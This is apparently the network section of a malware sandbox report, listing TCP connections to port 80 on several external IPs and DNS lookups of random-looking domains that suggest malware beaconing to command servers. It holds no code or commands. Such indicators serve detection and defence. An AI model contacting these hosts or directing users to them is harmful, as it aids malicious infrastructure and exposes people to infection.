                                                                            Jan 11, 2025 03:29:54.604281902 CET4971380192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:54.639239073 CET804971323.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:54.639327049 CET4971380192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:55.573105097 CET4971380192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:56.592201948 CET4971480192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:56.597138882 CET804971423.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:56.597218990 CET4971480192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:56.612962008 CET4971480192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:56.617825985 CET804971423.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:57.143776894 CET804971423.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:57.198004961 CET4971480192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:57.211569071 CET804971423.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:57.211626053 CET4971480192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:58.120076895 CET4971480192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:59.139066935 CET4971580192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:59.144090891 CET804971523.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:59.144210100 CET4971580192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:59.158823967 CET4971580192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:59.163865089 CET804971523.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:59.163903952 CET804971523.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:59.683837891 CET804971523.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:59.729424000 CET4971580192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:29:59.755934954 CET804971523.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:29:59.756160975 CET4971580192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:00.666881084 CET4971580192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:01.686328888 CET4971680192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:01.691279888 CET804971623.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:30:01.691386938 CET4971680192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:01.701118946 CET4971680192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:01.705965996 CET804971623.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:30:02.201824903 CET804971623.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:30:02.244910002 CET4971680192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:02.272980928 CET804971623.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:30:02.273159981 CET4971680192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:02.274112940 CET4971680192.168.2.823.225.160.132
                                                                            Jan 11, 2025 03:30:02.278970957 CET804971623.225.160.132192.168.2.8
                                                                            Jan 11, 2025 03:30:07.743164062 CET4971780192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:07.747992992 CET8049717149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:07.748089075 CET4971780192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:07.762860060 CET4971780192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:07.767679930 CET8049717149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:09.276304960 CET4971780192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:09.322520971 CET8049717149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:10.295351982 CET4971880192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:10.300472021 CET8049718149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:10.300968885 CET4971880192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:10.317536116 CET4971880192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:10.322446108 CET8049718149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:11.823282003 CET4971880192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:11.870630980 CET8049718149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:12.841922045 CET4971980192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:12.846726894 CET8049719149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:12.846823931 CET4971980192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:12.858727932 CET4971980192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:12.863512039 CET8049719149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:12.863641977 CET8049719149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:14.370040894 CET4971980192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:14.418533087 CET8049719149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:15.389626980 CET4972080192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:15.394577026 CET8049720149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:15.394686937 CET4972080192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:15.404853106 CET4972080192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:15.409667969 CET8049720149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:29.102688074 CET8049717149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:29.102757931 CET4971780192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:31.665040970 CET8049718149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:31.665128946 CET4971880192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:34.196369886 CET8049719149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:34.196594000 CET4971980192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:36.774013042 CET8049720149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:36.774128914 CET4972080192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:36.775144100 CET4972080192.168.2.8149.88.81.190
                                                                            Jan 11, 2025 03:30:36.780004025 CET8049720149.88.81.190192.168.2.8
                                                                            Jan 11, 2025 03:30:41.879708052 CET4972380192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:41.884731054 CET804972385.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:41.884830952 CET4972380192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:41.900368929 CET4972380192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:41.905308962 CET804972385.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:43.409204960 CET4972380192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:43.414478064 CET804972385.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:43.414586067 CET4972380192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:44.420207024 CET4972480192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:44.425364017 CET804972485.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:44.425472021 CET4972480192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:44.441673040 CET4972480192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:44.446639061 CET804972485.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:45.950345993 CET4972480192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:45.955713034 CET804972485.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:45.955895901 CET4972480192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:46.969343901 CET4972580192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:46.974447012 CET804972585.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:46.974524975 CET4972580192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:46.994822979 CET4972580192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:46.999708891 CET804972585.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:46.999815941 CET804972585.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:48.520762920 CET4972580192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:48.526042938 CET804972585.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:48.526165009 CET4972580192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:49.529361010 CET4972680192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:49.534615993 CET804972685.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:30:49.534701109 CET4972680192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:49.544825077 CET4972680192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:30:49.549854994 CET804972685.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:31:50.256149054 CET804972685.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:31:50.256272078 CET804972685.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:31:50.256479025 CET4972680192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:31:50.259459972 CET4972680192.168.2.885.159.66.93
                                                                            Jan 11, 2025 03:31:50.264295101 CET804972685.159.66.93192.168.2.8
                                                                            Jan 11, 2025 03:31:55.321760893 CET4972780192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:55.328202963 CET8049727185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:55.328329086 CET4972780192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:55.346839905 CET4972780192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:55.353174925 CET8049727185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:55.938622952 CET8049727185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:55.938698053 CET8049727185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:55.939007998 CET4972780192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:56.854850054 CET4972780192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:57.873970032 CET4972880192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:57.878808022 CET8049728185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:57.878951073 CET4972880192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:57.894366026 CET4972880192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:57.899413109 CET8049728185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:58.520096064 CET8049728185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:58.520181894 CET8049728185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:31:58.520385027 CET4972880192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:31:59.401788950 CET4972880192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:00.420752048 CET4972980192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:00.425728083 CET8049729185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:00.425827026 CET4972980192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:00.442199945 CET4972980192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:00.447072983 CET8049729185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:00.447127104 CET8049729185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:01.061295033 CET8049729185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:01.061386108 CET8049729185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:01.061439991 CET4972980192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:01.952100039 CET4972980192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:02.971195936 CET4973080192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:02.976207018 CET8049730185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:02.976279020 CET4973080192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:02.989187956 CET4973080192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:02.993982077 CET8049730185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:03.584242105 CET8049730185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:03.584255934 CET8049730185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:03.584408998 CET4973080192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:03.588278055 CET4973080192.168.2.8185.27.134.144
                                                                            Jan 11, 2025 03:32:03.593065977 CET8049730185.27.134.144192.168.2.8
                                                                            Jan 11, 2025 03:32:08.962459087 CET4973180192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:08.967324972 CET8049731104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:08.967416048 CET4973180192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:08.983369112 CET4973180192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:08.988224030 CET8049731104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:09.560853004 CET8049731104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:09.561559916 CET8049731104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:09.561619997 CET4973180192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:09.561709881 CET8049731104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:09.561759949 CET4973180192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:10.495572090 CET4973180192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:11.514672041 CET4973280192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:11.519663095 CET8049732104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:11.519757986 CET4973280192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:11.536220074 CET4973280192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:11.542231083 CET8049732104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:12.139859915 CET8049732104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:12.141472101 CET8049732104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:12.141540051 CET4973280192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:13.042445898 CET4973280192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:14.060630083 CET4973380192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:14.065713882 CET8049733104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:14.065809965 CET4973380192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:14.079730988 CET4973380192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:14.086842060 CET8049733104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:14.086864948 CET8049733104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:14.683618069 CET8049733104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:14.684514999 CET8049733104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:14.684572935 CET4973380192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:15.589423895 CET4973380192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:16.608807087 CET4973480192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:16.613991976 CET8049734104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:16.614134073 CET4973480192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:16.624221087 CET4973480192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:16.629141092 CET8049734104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:17.220102072 CET8049734104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:17.220382929 CET8049734104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:17.220453024 CET4973480192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:17.223109961 CET4973480192.168.2.8104.21.95.160
                                                                            Jan 11, 2025 03:32:17.227967978 CET8049734104.21.95.160192.168.2.8
                                                                            Jan 11, 2025 03:32:22.251168966 CET4973580192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:22.256067991 CET8049735188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:22.256388903 CET4973580192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:22.275620937 CET4973580192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:22.280489922 CET8049735188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:23.034081936 CET8049735188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:23.034868956 CET8049735188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:23.035065889 CET4973580192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:23.792433977 CET4973580192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:24.812350988 CET4973680192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:24.817358971 CET8049736188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:24.817442894 CET4973680192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:24.837517023 CET4973680192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:24.842384100 CET8049736188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:25.593369007 CET8049736188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:25.593872070 CET8049736188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:25.594022989 CET4973680192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:26.339523077 CET4973680192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:27.358514071 CET4973780192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:27.363375902 CET8049737188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:27.363476992 CET4973780192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:27.378837109 CET4973780192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:27.383704901 CET8049737188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:27.383836031 CET8049737188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:28.124409914 CET8049737188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:28.125607967 CET8049737188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:28.125662088 CET4973780192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:28.888137102 CET4973780192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:29.906513929 CET4973880192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:29.911360979 CET8049738188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:29.911449909 CET4973880192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:29.923579931 CET4973880192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:29.928380966 CET8049738188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:30.683577061 CET8049738188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:30.684000015 CET8049738188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:30.684067965 CET4973880192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:30.691446066 CET4973880192.168.2.8188.114.97.3
                                                                            Jan 11, 2025 03:32:30.696314096 CET8049738188.114.97.3192.168.2.8
                                                                            Jan 11, 2025 03:32:35.728899002 CET4973980192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:35.733818054 CET8049739154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:35.733985901 CET4973980192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:35.746030092 CET4973980192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:35.750940084 CET8049739154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:36.631516933 CET8049739154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:36.631628990 CET8049739154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:36.631691933 CET4973980192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:37.262234926 CET4973980192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:38.280610085 CET4974080192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:38.285495043 CET8049740154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:38.286721945 CET4974080192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:38.302222967 CET4974080192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:38.307013988 CET8049740154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:39.172046900 CET8049740154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:39.172182083 CET8049740154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:39.172597885 CET4974080192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:39.808187962 CET4974080192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:40.828068972 CET4974180192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:40.832959890 CET8049741154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:40.833122015 CET4974180192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:40.850877047 CET4974180192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:40.855699062 CET8049741154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:40.855791092 CET8049741154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:41.713254929 CET8049741154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:41.713272095 CET8049741154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:41.713395119 CET4974180192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:42.355038881 CET4974180192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:43.374536991 CET4974280192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:43.379476070 CET8049742154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:43.379569054 CET4974280192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:43.389837980 CET4974280192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:43.394642115 CET8049742154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:44.250277042 CET8049742154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:44.250365973 CET8049742154.88.22.101192.168.2.8
                                                                            Jan 11, 2025 03:32:44.250505924 CET4974280192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:44.253285885 CET4974280192.168.2.8154.88.22.101
                                                                            Jan 11, 2025 03:32:44.259727001 CET8049742154.88.22.101192.168.2.8

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 11, 2025 03:29:00.638461113 CET6447953192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:29:00.645720005 CET53644791.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:29:01.799027920 CET4934753192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:29:01.806207895 CET53493471.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:29:37.369537115 CET4992553192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:29:37.531527042 CET53499251.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:29:53.201998949 CET5237653192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:29:54.040798903 CET53523761.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:30:07.280565977 CET5279353192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:30:07.740356922 CET53527931.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:30:41.780282021 CET6404753192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:30:41.876156092 CET53640471.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:31:55.265736103 CET6113053192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:31:55.318609953 CET53611301.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:32:08.593173027 CET5195353192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:32:08.960033894 CET53519531.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:32:22.235893965 CET5245153192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:32:22.248383999 CET53524511.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:32:35.702662945 CET6075053192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:32:35.726413012 CET53607501.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:32:49.265563011 CET6376753192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:32:49.276887894 CET53637671.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:33:02.573400974 CET4925053192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:33:02.583733082 CET53492501.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:33:11.312449932 CET4979653192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:33:11.325858116 CET53497961.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:33:24.502417088 CET6467153192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:33:25.495989084 CET6467153192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:33:26.511631966 CET6467153192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:33:26.989151001 CET53646711.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:33:26.989177942 CET53646711.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:33:26.989207029 CET53646711.1.1.1192.168.2.8
                                                                            Jan 11, 2025 03:33:40.531138897 CET5336553192.168.2.81.1.1.1
                                                                            Jan 11, 2025 03:33:40.879465103 CET53533651.1.1.1192.168.2.8

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jan 11, 2025 03:29:00.638461113 CET192.168.2.81.1.1.10x22dStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:29:01.799027920 CET192.168.2.81.1.1.10xf54fStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:29:37.369537115 CET192.168.2.81.1.1.10x56e4Standard query (0)www.nb-shenshi.buzzA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:29:53.201998949 CET192.168.2.81.1.1.10xf478Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:30:07.280565977 CET192.168.2.81.1.1.10xa812Standard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:30:41.780282021 CET192.168.2.81.1.1.10x5c6Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:31:55.265736103 CET192.168.2.81.1.1.10x6bbStandard query (0)www.amayavp.xyzA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:32:08.593173027 CET192.168.2.81.1.1.10x7da6Standard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:32:22.235893965 CET192.168.2.81.1.1.10x7094Standard query (0)www.rgenerousrs.storeA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:32:35.702662945 CET192.168.2.81.1.1.10x4055Standard query (0)www.t91rl7.proA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:32:49.265563011 CET192.168.2.81.1.1.10x272cStandard query (0)www.learnwithus.siteA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:02.573400974 CET192.168.2.81.1.1.10x514cStandard query (0)www.cuthethoi.onlineA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:11.312449932 CET192.168.2.81.1.1.10x376eStandard query (0)www.rafconstrutora.onlineA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:24.502417088 CET192.168.2.81.1.1.10x8783Standard query (0)www.7vh2wy.topA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:25.495989084 CET192.168.2.81.1.1.10x8783Standard query (0)www.7vh2wy.topA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:26.511631966 CET192.168.2.81.1.1.10x8783Standard query (0)www.7vh2wy.topA (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:33:40.531138897 CET192.168.2.81.1.1.10xb37dStandard query (0)www.duwixushx.xyzA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jan 11, 2025 03:29:00.645720005 CET1.1.1.1192.168.2.80x22dNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:29:01.806207895 CET1.1.1.1192.168.2.80xf54fNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                            Jan 11, 2025 03:29:37.531527042 CET1.1.1.1192.168.2.80x56e4No error (0)www.nb-shenshi.buzz161.97.142.144A (IP address)IN (0x0001)false
